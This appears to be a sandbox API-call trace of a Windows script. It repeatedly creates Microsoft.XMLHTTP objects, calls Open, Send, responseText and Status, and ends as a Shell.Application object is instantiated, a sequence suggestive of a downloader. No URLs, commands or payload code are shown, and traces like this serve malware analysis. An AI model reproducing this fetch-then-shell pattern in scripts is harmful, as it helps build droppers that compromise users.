	[0520.437] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0520.437] SysStringLen (param_1=0x0) returned 0x0
	[0520.437] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0520.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0520.437] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0520.437] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0520.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0520.437] ??2@YAPEAX_K@Z () returned 0x62f330
	[0520.437] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0520.437] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0520.437] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0520.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0520.438] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0520.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0520.438] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0520.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0520.438] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0520.438] SysStringLen (param_1=0x0) returned 0x0
	[0520.438] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0520.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0520.438] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7c50) returned 0x0
	[0520.438] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0520.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0520.438] ??2@YAPEAX_K@Z () returned 0x62f310
	[0520.438] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0520.438] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0520.439] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0520.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7c50) returned 0x0
	[0520.439] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7c50) returned 0x3
	[0520.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0520.439] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0520.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0520.439] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0520.439] SysStringLen (param_1=0x0) returned 0x0
	[0520.439] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0520.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0520.439] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0520.439] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0520.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0520.439] ??2@YAPEAX_K@Z () returned 0x62f330
	[0520.440] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0520.440] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0520.440] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0520.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0520.440] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0520.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0520.440] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0520.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0520.440] longjmp () 
	[0520.440] longjmp () 
	[0520.440] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0520.440] SysStringLen (param_1=0x0) returned 0x0
	[0520.440] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0520.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0520.441] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0520.441] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0520.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0520.441] ??2@YAPEAX_K@Z () returned 0x62f310
	[0520.441] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0520.441] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0520.441] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0520.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0520.441] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0520.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0520.441] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0520.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0520.441] longjmp () 
	[0520.441] longjmp () 
	[0520.442] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0520.442] SysStringLen (param_1=0x0) returned 0x0
	[0520.442] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0520.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0520.442] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7c50) returned 0x0
	[0520.442] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0520.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0520.442] ??2@YAPEAX_K@Z () returned 0x62f330
	[0520.442] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f330) 
	[0520.442] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0520.442] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0520.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7c50) returned 0x0
	[0520.442] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7c50) returned 0x3
	[0520.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0520.442] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0520.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0520.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0520.443] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0520.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0521.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0521.045] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0521.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0521.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0521.045] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0521.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0521.045] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0521.045] SysStringLen (param_1=0x0) returned 0x0
	[0521.046] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0521.046] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0521.046] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0521.046] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0521.046] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0521.046] ??2@YAPEAX_K@Z () returned 0x62f350
